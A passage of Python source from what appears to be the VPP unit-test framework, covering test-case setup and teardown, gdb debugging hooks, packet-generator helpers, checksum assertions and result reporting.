print("You can debug VPP using:")
if cls.debug_gdbserver:
print("sudo gdb " + cls.vpp_bin +
" -ex 'target remote localhost:{port}'"
.format(port=cls.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume VPP from "
"within gdb by issuing the 'continue' command")
cls.gdbserver_port += 1
elif cls.debug_gdb:
print("sudo gdb " + cls.vpp_bin + " -ex 'attach %s'" % cls.vpp.pid)
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume VPP from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
@classmethod
def attach_vpp(cls):
cls.vpp = DummyVpp()
@classmethod
def run_vpp(cls):
cls.logger.debug(f"Assigned cpus: {cls.cpus}")
cmdline = cls.vpp_cmdline
if cls.debug_gdbserver:
gdbserver = '/usr/bin/gdbserver'
if not os.path.isfile(gdbserver) or\
not os.access(gdbserver, os.X_OK):
raise Exception("gdbserver binary '%s' does not exist or is "
"not executable" % gdbserver)
cmdline = [gdbserver, 'localhost:{port}'
.format(port=cls.gdbserver_port)] + cls.vpp_cmdline
cls.logger.info("Gdbserver cmdline is %s", " ".join(cmdline))
try:
cls.vpp = subprocess.Popen(cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
cls.logger.critical("Subprocess returned with non-0 return code: ("
"%s)", e.returncode)
raise
except OSError as e:
cls.logger.critical("Subprocess returned with OS error: "
"(%s) %s", e.errno, e.strerror)
raise
except Exception as e:
cls.logger.exception("Subprocess returned unexpected from "
"%s:", cmdline)
raise
cls.wait_for_enter()
@classmethod
def wait_for_coredump(cls):
corefile = cls.tempdir + "/core"
if os.path.isfile(corefile):
cls.logger.error("Waiting for coredump to complete: %s", corefile)
curr_size = os.path.getsize(corefile)
deadline = time.time() + 60
ok = False
while time.time() < deadline:
cls.sleep(1)
size = curr_size
curr_size = os.path.getsize(corefile)
if size == curr_size:
ok = True
break
if not ok:
cls.logger.error("Timed out waiting for coredump to complete:"
" %s", corefile)
else:
cls.logger.error("Coredump complete: %s, size %d",
corefile, curr_size)
@classmethod
def get_stats_sock_path(cls):
return "%s/stats.sock" % cls.tempdir
@classmethod
def get_api_sock_path(cls):
return "%s/api.sock" % cls.tempdir
@classmethod
def get_api_segment_prefix(cls):
return os.path.basename(cls.tempdir) # Only used for VAPI
@classmethod
def get_tempdir(cls):
if cls.debug_attach:
return os.getenv("VPP_IN_GDB_TMP_DIR",
"/tmp/unittest-attach-gdb")
else:
return tempfile.mkdtemp(prefix='vpp-unittest-%s-' % cls.__name__)
@classmethod
def setUpClass(cls):
"""
Perform class setup before running the testcase
Remove shared memory files, start vpp and connect the vpp-api
"""
super(VppTestCase, cls).setUpClass()
cls.logger = get_logger(cls.__name__)
seed = os.environ["RND_SEED"]
random.seed(seed)
if hasattr(cls, 'parallel_handler'):
cls.logger.addHandler(cls.parallel_handler)
cls.logger.propagate = False
d = os.getenv("DEBUG", None)
cls.set_debug_flags(d)
cls.tempdir = cls.get_tempdir()
cls.file_handler = FileHandler("%s/log.txt" % cls.tempdir)
cls.file_handler.setFormatter(
Formatter(fmt='%(asctime)s,%(msecs)03d %(message)s',
datefmt="%H:%M:%S"))
cls.file_handler.setLevel(DEBUG)
cls.logger.addHandler(cls.file_handler)
cls.logger.debug("--- setUpClass() for %s called ---" % cls.__name__)
os.chdir(cls.tempdir)
cls.logger.info("Temporary dir is %s, api socket is %s",
cls.tempdir, cls.get_api_sock_path())
cls.logger.debug("Random seed is %s", seed)
cls.setUpConstants()
cls.reset_packet_infos()
cls._pcaps = []
cls._old_pcaps = []
cls.verbose = 0
cls.vpp_dead = False
cls.registry = VppObjectRegistry()
cls.vpp_startup_failed = False
cls.reporter = KeepAliveReporter()
# need to catch exceptions here because if we raise, then the cleanup
# doesn't get called and we might end with a zombie vpp
try:
if cls.debug_attach:
cls.attach_vpp()
else:
cls.run_vpp()
cls.reporter.send_keep_alive(cls, 'setUpClass')
VppTestResult.current_test_case_info = TestCaseInfo(
cls.logger, cls.tempdir, cls.vpp.pid, cls.vpp_bin)
cls.vpp_stdout_deque = deque()
cls.vpp_stderr_deque = deque()
if not cls.debug_attach:
cls.pump_thread_stop_flag = Event()
cls.pump_thread_wakeup_pipe = os.pipe()
cls.pump_thread = Thread(target=pump_output, args=(cls,))
cls.pump_thread.daemon = True
cls.pump_thread.start()
if cls.debug_gdb or cls.debug_gdbserver or cls.debug_attach:
cls.vapi_response_timeout = 0
cls.vapi = VppPapiProvider(cls.__name__, cls,
cls.vapi_response_timeout)
if cls.step:
hook = hookmodule.StepHook(cls)
else:
hook = hookmodule.PollHook(cls)
cls.vapi.register_hook(hook)
cls.statistics = VPPStats(socketname=cls.get_stats_sock_path())
try:
hook.poll_vpp()
except VppDiedError:
cls.vpp_startup_failed = True
cls.logger.critical(
"VPP died shortly after startup, check the"
" output to standard error for possible cause")
raise
try:
cls.vapi.connect()
except (vpp_papi.VPPIOError, Exception) as e:
cls.logger.debug("Exception connecting to vapi: %s" % e)
cls.vapi.disconnect()
if cls.debug_gdbserver:
print(colorize("You're running VPP inside gdbserver but "
"VPP-API connection failed, did you forget "
"to 'continue' VPP from within gdb?", RED))
raise e
if cls.debug_attach:
last_line = cls.vapi.cli("show thread").split("\n")[-2]
cls.vpp_worker_count = int(last_line.split(" ")[0])
print("Detected VPP with %s workers." % cls.vpp_worker_count)
except vpp_papi.VPPRuntimeError as e:
cls.logger.debug("%s" % e)
cls.quit()
raise e
except Exception as e:
cls.logger.debug("Exception connecting to VPP: %s" % e)
cls.quit()
raise e
@classmethod
def _debug_quit(cls):
if (cls.debug_gdbserver or cls.debug_gdb):
try:
cls.vpp.poll()
if cls.vpp.returncode is None:
print()
print(double_line_delim)
print("VPP or GDB server is still running")
print(single_line_delim)
input("When done debugging, press ENTER to kill the "
"process and finish running the testcase...")
except AttributeError:
pass
@classmethod
def quit(cls):
"""
Disconnect vpp-api, kill vpp and cleanup shared memory files
"""
cls._debug_quit()
# first signal that we want to stop the pump thread, then wake it up
if hasattr(cls, 'pump_thread_stop_flag'):
cls.pump_thread_stop_flag.set()
if hasattr(cls, 'pump_thread_wakeup_pipe'):
os.write(cls.pump_thread_wakeup_pipe[1], b'ding dong wake up')
if hasattr(cls, 'pump_thread'):
cls.logger.debug("Waiting for pump thread to stop")
cls.pump_thread.join()
if hasattr(cls, 'vpp_stderr_reader_thread'):
cls.logger.debug("Waiting for stderr pump to stop")
cls.vpp_stderr_reader_thread.join()
if hasattr(cls, 'vpp'):
if hasattr(cls, 'vapi'):
cls.logger.debug(cls.vapi.vpp.get_stats())
cls.logger.debug("Disconnecting class vapi client on %s",
cls.__name__)
cls.vapi.disconnect()
cls.logger.debug("Deleting class vapi attribute on %s",
cls.__name__)
del cls.vapi
cls.vpp.poll()
if not cls.debug_attach and cls.vpp.returncode is None:
cls.wait_for_coredump()
cls.logger.debug("Sending TERM to vpp")
cls.vpp.terminate()
cls.logger.debug("Waiting for vpp to die")
try:
outs, errs = cls.vpp.communicate(timeout=5)
except subprocess.TimeoutExpired:
cls.vpp.kill()
outs, errs = cls.vpp.communicate()
cls.logger.debug("Deleting class vpp attribute on %s",
cls.__name__)
if not cls.debug_attach:
cls.vpp.stdout.close()
cls.vpp.stderr.close()
del cls.vpp
if cls.vpp_startup_failed:
stdout_log = cls.logger.info
stderr_log = cls.logger.critical
else:
stdout_log = cls.logger.info
stderr_log = cls.logger.info
if hasattr(cls, 'vpp_stdout_deque'):
stdout_log(single_line_delim)
stdout_log('VPP output to stdout while running %s:', cls.__name__)
stdout_log(single_line_delim)
vpp_output = "".join(cls.vpp_stdout_deque)
with open(cls.tempdir + '/vpp_stdout.txt', 'w') as f:
f.write(vpp_output)
stdout_log('\n%s', vpp_output)
stdout_log(single_line_delim)
if hasattr(cls, 'vpp_stderr_deque'):
stderr_log(single_line_delim)
stderr_log('VPP output to stderr while running %s:', cls.__name__)
stderr_log(single_line_delim)
vpp_output = "".join(cls.vpp_stderr_deque)
with open(cls.tempdir + '/vpp_stderr.txt', 'w') as f:
f.write(vpp_output)
stderr_log('\n%s', vpp_output)
stderr_log(single_line_delim)
@classmethod
def tearDownClass(cls):
""" Perform final cleanup after running all tests in this test-case """
cls.logger.debug("--- tearDownClass() for %s called ---" %
cls.__name__)
cls.reporter.send_keep_alive(cls, 'tearDownClass')
cls.quit()
cls.file_handler.close()
cls.reset_packet_infos()
if debug_framework:
debug_internal.on_tear_down_class(cls)
def show_commands_at_teardown(self):
""" Allow subclass specific teardown logging additions."""
self.logger.info("--- No test specific show commands provided. ---")
def tearDown(self):
""" Show various debug prints after each test """
self.logger.debug("--- tearDown() for %s.%s(%s) called ---" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
try:
if not self.vpp_dead:
self.logger.debug(self.vapi.cli("show trace max 1000"))
self.logger.info(self.vapi.ppcli("show interface"))
self.logger.info(self.vapi.ppcli("show hardware"))
self.logger.info(self.statistics.set_errors_str())
self.logger.info(self.vapi.ppcli("show run"))
self.logger.info(self.vapi.ppcli("show log"))
self.logger.info(self.vapi.ppcli("show bihash"))
self.logger.info("Logging testcase specific show commands.")
self.show_commands_at_teardown()
self.registry.remove_vpp_config(self.logger)
# Save/Dump VPP api trace log
m = self._testMethodName
api_trace = "vpp_api_trace.%s.%d.log" % (m, self.vpp.pid)
tmp_api_trace = "/tmp/%s" % api_trace
vpp_api_trace_log = "%s/%s" % (self.tempdir, api_trace)
self.logger.info(self.vapi.ppcli("api trace save %s" % api_trace))
self.logger.info("Moving %s to %s\n" % (tmp_api_trace,
vpp_api_trace_log))
os.rename(tmp_api_trace, vpp_api_trace_log)
except VppTransportSocketIOError:
self.logger.debug("VppTransportSocketIOError: Vpp dead. "
"Cannot log show commands.")
self.vpp_dead = True
else:
self.registry.unregister_all(self.logger)
def setUp(self):
""" Clear trace before running each test"""
super(VppTestCase, self).setUp()
self.reporter.send_keep_alive(self)
if self.vpp_dead:
raise VppDiedError(rv=None, testcase=self.__class__.__name__,
method_name=self._testMethodName)
self.sleep(.1, "during setUp")
self.vpp_stdout_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vpp_stderr_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vapi.cli("clear trace")
# store the test instance inside the test class - so that objects
# holding the class can access instance methods (like assertEqual)
type(self).test_instance = self
@classmethod
def pg_enable_capture(cls, interfaces=None):
"""
Enable capture on packet-generator interfaces
:param interfaces: iterable interface indexes (if None,
use self.pg_interfaces)
"""
if interfaces is None:
interfaces = cls.pg_interfaces
for i in interfaces:
i.enable_capture()
@classmethod
def register_pcap(cls, intf, worker):
""" Register a pcap in the testclass """
# add to the list of captures with current timestamp
cls._pcaps.append((intf, worker))
@classmethod
def get_vpp_time(cls):
# processes e.g. "Time now 2.190522, Wed, 11 Mar 2020 17:29:54 GMT"
# returns float("2.190522")
timestr = cls.vapi.cli('show clock')
head, sep, tail = timestr.partition(',')
head, sep, tail = head.partition('Time now')
return float(tail)
@classmethod
def sleep_on_vpp_time(cls, sec):
""" Sleep according to time in VPP world """
# On a busy system with many processes
# we might end up with VPP time being slower than real world
# So take that into account when waiting for VPP to do something
start_time = cls.get_vpp_time()
while cls.get_vpp_time() - start_time < sec:
cls.sleep(0.1)
@classmethod
def pg_start(cls, trace=True):
""" Enable the PG, wait till it is done, then clean up """
for (intf, worker) in cls._old_pcaps:
intf.rename_old_pcap_file(intf.get_in_path(worker),
intf.in_history_counter)
cls._old_pcaps = []
if trace:
cls.vapi.cli("clear trace")
cls.vapi.cli("trace add pg-input 1000")
cls.vapi.cli('packet-generator enable')
        # The PG, once started, runs to completion -
        # so to avoid a race condition,
        # wait a little until it is done,
        # then clean it up - and then be gone.
deadline = time.time() + 300
while cls.vapi.cli('show packet-generator').find("Yes") != -1:
cls.sleep(0.01) # yield
if time.time() > deadline:
cls.logger.error("Timeout waiting for pg to stop")
break
for intf, worker in cls._pcaps:
cls.vapi.cli('packet-generator delete %s' %
intf.get_cap_name(worker))
cls._old_pcaps = cls._pcaps
cls._pcaps = []
@classmethod
def create_pg_interfaces_internal(cls, interfaces, gso=0, gso_size=0,
mode=None):
"""
Create packet-generator interfaces.
:param interfaces: iterable indexes of the interfaces.
:returns: List of created interfaces.
"""
result = []
for i in interfaces:
intf = VppPGInterface(cls, i, gso, gso_size, mode)
setattr(cls, intf.name, intf)
result.append(intf)
cls.pg_interfaces = result
return result
@classmethod
def create_pg_ip4_interfaces(cls, interfaces, gso=0, gso_size=0):
pgmode = VppEnum.vl_api_pg_interface_mode_t
return cls.create_pg_interfaces_internal(interfaces, gso, gso_size,
pgmode.PG_API_MODE_IP4)
@classmethod
def create_pg_ip6_interfaces(cls, interfaces, gso=0, gso_size=0):
pgmode = VppEnum.vl_api_pg_interface_mode_t
return cls.create_pg_interfaces_internal(interfaces, gso, gso_size,
pgmode.PG_API_MODE_IP6)
@classmethod
def create_pg_interfaces(cls, interfaces, gso=0, gso_size=0):
pgmode = VppEnum.vl_api_pg_interface_mode_t
return cls.create_pg_interfaces_internal(interfaces, gso, gso_size,
pgmode.PG_API_MODE_ETHERNET)
@classmethod
def create_pg_ethernet_interfaces(cls, interfaces, gso=0, gso_size=0):
pgmode = VppEnum.vl_api_pg_interface_mode_t
return cls.create_pg_interfaces_internal(interfaces, gso, gso_size,
pgmode.PG_API_MODE_ETHERNET)
@classmethod
def create_loopback_interfaces(cls, count):
"""
Create loopback interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppLoInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.lo_interfaces = result
return result
@classmethod
def create_bvi_interfaces(cls, count):
"""
Create BVI interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppBviInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.bvi_interfaces = result
return result
@staticmethod
def extend_packet(packet, size, padding=' '):
"""
Extend packet to given size by padding with spaces or custom padding
NOTE: Currently works only when Raw layer is present.
:param packet: packet
:param size: target size
:param padding: padding used to extend the payload
"""
packet_len = len(packet) + 4
extend = size - packet_len
if extend > 0:
num = (extend // len(padding)) + 1
packet[Raw].load += (padding * num)[:extend].encode("ascii")
@classmethod
def reset_packet_infos(cls):
""" Reset the list of packet info objects and packet counts to zero """
cls._packet_infos = {}
cls._packet_count_for_dst_if_idx = {}
@classmethod
def create_packet_info(cls, src_if, dst_if):
"""
Create packet info object containing the source and destination indexes
and add it to the testcase's packet info list
:param VppInterface src_if: source interface
:param VppInterface dst_if: destination interface
:returns: _PacketInfo object
"""
info = _PacketInfo()
info.index = len(cls._packet_infos)
info.src = src_if.sw_if_index
info.dst = dst_if.sw_if_index
if isinstance(dst_if, VppSubInterface):
dst_idx = dst_if.parent.sw_if_index
else:
dst_idx = dst_if.sw_if_index
if dst_idx in cls._packet_count_for_dst_if_idx:
cls._packet_count_for_dst_if_idx[dst_idx] += 1
else:
cls._packet_count_for_dst_if_idx[dst_idx] = 1
cls._packet_infos[info.index] = info
return info
@staticmethod
def info_to_payload(info):
"""
Convert _PacketInfo object to packet payload
:param info: _PacketInfo object
:returns: string containing serialized data from packet info
"""
return "%d %d %d %d %d" % (info.index, info.src, info.dst,
info.ip, info.proto)
@staticmethod
def payload_to_info(payload, payload_field='load'):
"""
Convert packet payload to _PacketInfo object
:param payload: packet payload
:type payload: <class 'scapy.packet.Raw'>
:param payload_field: packet fieldname of payload "load" for
<class 'scapy.packet.Raw'>
:type payload_field: str
:returns: _PacketInfo object containing de-serialized data from payload
"""
numbers = getattr(payload, payload_field).split()
info = _PacketInfo()
info.index = int(numbers[0])
info.src = int(numbers[1])
info.dst = int(numbers[2])
info.ip = int(numbers[3])
info.proto = int(numbers[4])
return info
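    # Illustrative round trip (sketch): an info with index=0, src=1, dst=2,
    # ip=4, proto=17 serializes via info_to_payload() to "0 1 2 4 17", which
    # payload_to_info() parses back into an equivalent _PacketInfo.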
def get_next_packet_info(self, info):
"""
Iterate over the packet info list stored in the testcase
Start iteration with first element if info is None
Continue based on index in info if info is specified
:param info: info or None
:returns: next info in list or None if no more infos
"""
if info is None:
next_index = 0
else:
next_index = info.index + 1
if next_index == len(self._packet_infos):
return None
else:
return self._packet_infos[next_index]
def get_next_packet_info_for_interface(self, src_index, info):
"""
Search the packet info list for the next packet info with same source
interface index
:param src_index: source interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info(info)
if info is None:
return None
if info.src == src_index:
return info
def get_next_packet_info_for_interface2(self, src_index, dst_index, info):
"""
Search the packet info list for the next packet info with same source
and destination interface indexes
:param src_index: source interface index to search for
:param dst_index: destination interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info_for_interface(src_index, info)
if info is None:
return None
if info.dst == dst_index:
return info
def assert_equal(self, real_value, expected_value, name_or_class=None):
if name_or_class is None:
self.assertEqual(real_value, expected_value)
return
try:
msg = "Invalid %s: %d('%s') does not match expected value %d('%s')"
msg = msg % (getdoc(name_or_class).strip(),
real_value, str(name_or_class(real_value)),
expected_value, str(name_or_class(expected_value)))
except Exception:
msg = "Invalid %s: %s does not match expected value %s" % (
name_or_class, real_value, expected_value)
self.assertEqual(real_value, expected_value, msg)
def assert_in_range(self,
real_value,
expected_min,
expected_max,
name=None):
if name is None:
msg = None
else:
msg = "Invalid %s: %s out of range <%s,%s>" % (
name, real_value, expected_min, expected_max)
self.assertTrue(expected_min <= real_value <= expected_max, msg)
def assert_packet_checksums_valid(self, packet,
ignore_zero_udp_checksums=True):
received = packet.__class__(scapy.compat.raw(packet))
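        # Strategy: rebuild the packet from its raw bytes, remove every
        # checksum field found on any layer, let scapy recompute the checksums
        # when the packet is re-dissected, then compare the recomputed values
        # with the ones that were actually received.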
udp_layers = ['UDP', 'UDPerror']
checksum_fields = ['cksum', 'chksum']
checksums = []
counter = 0
temp = received.__class__(scapy.compat.raw(received))
while True:
layer = temp.getlayer(counter)
if layer:
layer = layer.copy()
layer.remove_payload()
for cf in checksum_fields:
if hasattr(layer, cf):
if ignore_zero_udp_checksums and \
0 == getattr(layer, cf) and \
layer.name in udp_layers:
continue
delattr(temp.getlayer(counter), cf)
checksums.append((counter, cf))
else:
break
counter = counter + 1
if 0 == len(checksums):
return
temp = temp.__class__(scapy.compat.raw(temp))
for layer, cf in checksums:
calc_sum = getattr(temp[layer], cf)
self.assert_equal(
getattr(received[layer], cf), calc_sum,
"packet checksum on layer #%d: %s" % (layer, temp[layer].name))
self.logger.debug(
"Checksum field `%s` on `%s` layer has correct value `%s`" %
(cf, temp[layer].name, calc_sum))
def assert_checksum_valid(self, received_packet, layer,
field_name='chksum',
ignore_zero_checksum=False):
""" Check checksum of received packet on given layer """
received_packet_checksum = getattr(received_packet[layer], field_name)
if ignore_zero_checksum and 0 == received_packet_checksum:
return
recalculated = received_packet.__class__(
scapy.compat.raw(received_packet))
delattr(recalculated[layer], field_name)
recalculated = recalculated.__class__(scapy.compat.raw(recalculated))
self.assert_equal(received_packet_checksum,
getattr(recalculated[layer], field_name),
"packet checksum on layer: %s" % layer)
def assert_ip_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'IP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_tcp_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'TCP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_udp_checksum_valid(self, received_packet,
ignore_zero_checksum=True):
self.assert_checksum_valid(received_packet, 'UDP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_embedded_icmp_checksum_valid(self, received_packet):
if received_packet.haslayer(IPerror):
self.assert_checksum_valid(received_packet, 'IPerror')
if received_packet.haslayer(TCPerror):
self.assert_checksum_valid(received_packet, 'TCPerror')
if received_packet.haslayer(UDPerror):
self.assert_checksum_valid(received_packet, 'UDPerror',
ignore_zero_checksum=True)
if received_packet.haslayer(ICMPerror):
self.assert_checksum_valid(received_packet, 'ICMPerror')
def assert_icmp_checksum_valid(self, received_packet):
self.assert_checksum_valid(received_packet, 'ICMP')
self.assert_embedded_icmp_checksum_valid(received_packet)
def assert_icmpv6_checksum_valid(self, pkt):
if pkt.haslayer(ICMPv6DestUnreach):
self.assert_checksum_valid(pkt, 'ICMPv6DestUnreach', 'cksum')
self.assert_embedded_icmp_checksum_valid(pkt)
if pkt.haslayer(ICMPv6EchoRequest):
self.assert_checksum_valid(pkt, 'ICMPv6EchoRequest', 'cksum')
if pkt.haslayer(ICMPv6EchoReply):
self.assert_checksum_valid(pkt, 'ICMPv6EchoReply', 'cksum')
def get_packet_counter(self, counter):
if counter.startswith("/"):
counter_value = self.statistics.get_counter(counter)
else:
counters = self.vapi.cli("sh errors").split('\n')
counter_value = 0
for i in range(1, len(counters) - 1):
results = counters[i].split()
if results[1] == counter:
counter_value = int(results[0])
break
return counter_value
def assert_packet_counter_equal(self, counter, expected_value):
counter_value = self.get_packet_counter(counter)
self.assert_equal(counter_value, expected_value,
"packet counter `%s'" % counter)
def assert_error_counter_equal(self, counter, expected_value):
counter_value = self.statistics[counter].sum()
self.assert_equal(counter_value, expected_value,
"error counter `%s'" % counter)
@classmethod
def sleep(cls, timeout, remark=None):
# /* Allow sleep(0) to maintain win32 semantics, and as decreed
# * by Guido, only the main thread can be interrupted.
# */
# https://github.com/python/cpython/blob/6673decfa0fb078f60587f5cb5e98460eea137c2/Modules/timemodule.c#L1892 # noqa
if timeout == 0:
# yield quantum
if hasattr(os, 'sched_yield'):
os.sched_yield()
else:
time.sleep(0)
return
cls.logger.debug("Starting sleep for %es (%s)", timeout, remark)
before = time.time()
time.sleep(timeout)
after = time.time()
if after - before > 2 * timeout:
cls.logger.error("unexpected self.sleep() result - "
"slept for %es instead of ~%es!",
after - before, timeout)
cls.logger.debug(
"Finished sleep (%s) - slept %es (wanted %es)",
remark, after - before, timeout)
def pg_send(self, intf, pkts, worker=None, trace=True):
intf.add_stream(pkts, worker=worker)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start(trace=trace)
def send_and_assert_no_replies(self, intf, pkts, remark="", timeout=None):
self.pg_send(intf, pkts)
if not timeout:
timeout = 1
for i in self.pg_interfaces:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured(remark=remark)
timeout = 0.1
def send_and_expect(self, intf, pkts, output, n_rx=None, worker=None,
trace=True):
if not n_rx:
n_rx = len(pkts)
self.pg_send(intf, pkts, worker=worker, trace=trace)
rx = output.get_capture(n_rx)
if trace:
self.logger.debug(self.vapi.cli("show trace"))
return rx
def send_and_expect_only(self, intf, pkts, output, timeout=None):
self.pg_send(intf, pkts)
rx = output.get_capture(len(pkts))
outputs = [output]
if not timeout:
timeout = 1
for i in self.pg_interfaces:
if i not in outputs:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured()
timeout = 0.1
return rx
def get_testcase_doc_name(test):
return getdoc(test.__class__).splitlines()[0]
def get_test_description(descriptions, test):
short_description = test.shortDescription()
if descriptions and short_description:
return short_description
else:
return str(test)
class TestCaseInfo(object):
def __init__(self, logger, tempdir, vpp_pid, vpp_bin_path):
self.logger = logger
self.tempdir = tempdir
self.vpp_pid = vpp_pid
self.vpp_bin_path = vpp_bin_path
self.core_crash_test = None
class VppTestResult(unittest.TestResult):
"""
@property result_string
String variable to store the test case result string.
@property errors
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test which
raised an unexpected exception.
@property failures
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test where
a failure was explicitly signalled using the TestCase.assert*()
methods.
"""
failed_test_cases_info = set()
core_crash_test_cases_info = set()
current_test_case_info = None
def __init__(self, stream=None, descriptions=None, verbosity=None,
runner=None):
"""
:param stream File descriptor to store where to report test results.
Set to the standard error stream by default.
:param descriptions Boolean variable to store information if to use
test case descriptions.
:param verbosity Integer variable to store required verbosity level.
"""
super(VppTestResult, self).__init__(stream, descriptions, verbosity)
self.stream = stream
self.descriptions = descriptions
self.verbosity = verbosity
self.result_string = None
self.runner = runner
self.printed = []
def addSuccess(self, test):
"""
Record a test succeeded result
:param test:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSuccess() %s.%s(%s) called" % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc))
unittest.TestResult.addSuccess(self, test)
self.result_string = colorize("OK", GREEN)
self.send_result_through_pipe(test, PASS)
def addSkip(self, test, reason):
"""
Record a test skipped.
:param test:
:param reason:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSkip() %s.%s(%s) called, reason is %s" %
(test.__class__.__name__, test._testMethodName,
test._testMethodDoc, reason))
unittest.TestResult.addSkip(self, test, reason)
self.result_string = colorize("SKIP", YELLOW)
if reason == "not enough cpus":
self.send_result_through_pipe(test, SKIP_CPU_SHORTAGE)
else:
self.send_result_through_pipe(test, SKIP)
def symlink_failed(self):
if self.current_test_case_info:
try:
failed_dir = os.getenv('FAILED_DIR')
link_path = os.path.join(
failed_dir,
'%s-FAILED' %
os.path.basename(self.current_test_case_info.tempdir))
self.current_test_case_info.logger.debug(
"creating a link to the failed test")
self.current_test_case_info.logger.debug(
"os.symlink(%s, %s)" %
(self.current_test_case_info.tempdir, link_path))
if os.path.exists(link_path):
self.current_test_case_info.logger.debug(
'symlink already exists')
else:
os.symlink(self.current_test_case_info.tempdir, link_path)
except Exception as e:
self.current_test_case_info.logger.error(e)
def send_result_through_pipe(self, test, result):
if hasattr(self, 'test_framework_result_pipe'):
pipe = self.test_framework_result_pipe
if pipe:
pipe.send((test.id(), result))
def log_error(self, test, err, fn_name):
if self.current_test_case_info:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = test.description
else:
test_name = '%s.%s(%s)' % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc)
self.current_test_case_info.logger.debug(
"--- %s() %s called, err is %s" %
(fn_name, test_name, err))
self.current_test_case_info.logger.debug(
"formatted exception is:\n%s" %
"".join(format_exception(*err)))
def add_error(self, test, err, unittest_fn, error_type):
if error_type == FAIL:
self.log_error(test, err, 'addFailure')
error_type_str = colorize("FAIL", RED)
elif error_type == ERROR:
self.log_error(test, err, 'addError')
error_type_str = colorize("ERROR", RED)
else:
raise Exception('Error type %s cannot be used to record an '
'error or a failure' % error_type)
unittest_fn(self, test, err)
if self.current_test_case_info:
self.result_string = "%s [ temp dir used by test case: %s ]" % \
(error_type_str,
self.current_test_case_info.tempdir)
self.symlink_failed()
self.failed_test_cases_info.add(self.current_test_case_info)
if is_core_present(self.current_test_case_info.tempdir):
if not self.current_test_case_info.core_crash_test:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = str(test)
else:
test_name = "'{!s}' ({!s})".format(
get_testcase_doc_name(test), test.id())
self.current_test_case_info.core_crash_test = test_name
self.core_crash_test_cases_info.add(
self.current_test_case_info)
else:
self.result_string = '%s [no temp dir]' % error_type_str
self.send_result_through_pipe(test, error_type)
def addFailure(self, test, err):
"""
Record a test failed result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addFailure, FAIL)
def addError(self, test, err):
"""
Record a test error result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addError, ERROR)
def getDescription(self, test):
"""
Get test description
:param test:
:returns: test description
"""
return get_test_description(self.descriptions, test)
def startTest(self, test):
"""
Start a test
:param test:
"""
def print_header(test):
if test.__class__ in self.printed:
return
test_doc = getdoc(test)
if not test_doc:
raise Exception("No doc string for test '%s'" % test.id())
test_title = test_doc.splitlines()[0].rstrip()
test_title = colorize(test_title, GREEN)
if test.is_tagged_run_solo():
test_title = colorize(f"SOLO RUN: {test_title}", YELLOW)
# This block may overwrite the colorized title above,
# but we want this to stand out and be fixed
if test.has_tag(TestCaseTag.FIXME_VPP_WORKERS):
test_title = colorize(
f"FIXME with VPP workers: {test_title}", RED)
if hasattr(test, 'vpp_worker_count'):
if test.vpp_worker_count == 0:
test_title += " [main thread only]"
elif test.vpp_worker_count == 1:
test_title += " [1 worker thread]"
else:
test_title += f" [{test.vpp_worker_count} worker threads]"
if test.__class__.skipped_due_to_cpu_lack:
test_title = colorize(
f"{test_title} [skipped - not enough cpus, "
f"required={test.__class__.get_cpus_required()}, "
f"available={max_vpp_cpus}]", YELLOW)
print(double_line_delim)
print(test_title)
print(double_line_delim)
self.printed.append(test.__class__)
print_header(test)
self.start_test = time.time()
unittest.TestResult.startTest(self, test)
if self.verbosity > 0:
self.stream.writeln(
"Starting " + self.getDescription(test) + " ...")
self.stream.writeln(single_line_delim)
def stopTest(self, test):
"""
Called when the given test has been run
:param test:
"""
unittest.TestResult.stopTest(self, test)
if self.verbosity > 0:
self.stream.writeln(single_line_delim)
self.stream.writeln("%-73s%s" % (self.getDescription(test),
self.result_string))
self.stream.writeln(single_line_delim)
else:
self.stream.writeln("%-68s %4.2f %s" %
(self.getDescription(test),
time.time() - self.start_test,
self.result_string))
self.send_result_through_pipe(test, TEST_RUN)
def printErrors(self):
"""
Print errors from running the test case
"""
if len(self.errors) > 0 or len(self.failures) > 0:
self.stream.writeln()
self.printErrorList('ERROR', self.errors)
self.printErrorList('FAIL', self.failures)
# ^^ that is the last output from unittest before summary
if not self.runner.print_summary:
devnull = unittest.runner._WritelnDecorator(open(os.devnull, 'w'))
self.stream = devnull
self.runner.stream = devnull
def printErrorList(self, flavour, errors):
"""
Print error list to the output stream together with error type
and test case description.
:param flavour: error type
